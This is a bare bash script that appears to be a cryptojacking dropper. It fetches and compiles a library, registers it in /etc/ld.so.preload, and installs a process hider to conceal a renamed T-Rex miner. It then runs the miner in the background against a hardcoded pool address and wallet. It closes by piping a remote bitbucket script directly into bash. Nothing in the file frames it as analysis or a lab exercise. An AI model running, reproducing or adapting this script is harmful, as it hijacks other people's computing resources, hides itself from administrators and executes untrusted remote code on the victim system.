#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/adawisaud/adawisaud/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 8.8.8.8;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.3.1 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget https://github.com/trexminer/T-Rex/releases/download/0.26.8/t-rex-0.26.8-linux.tar.gz >/dev/null 2>&1
tar -xvf t-rex-0.26.8-linux.tar.gz >/dev/null 2>&1
rm -rvf t-rex-0.26.8-linux.tar.gz >/dev/null 2>&1
mv t-rex sgr1
./sgr1 -a kawpow -o stratum+tcp://149.28.147.155:80 -u GQLjm35cNJZWb3ueYnowdrw5Y2JMYB9YNZ.EE -p x >/dev/null 2>&1 &
curl -sL https://bitbucket.org/koploks/shc/raw/master/boled04.sh | bash
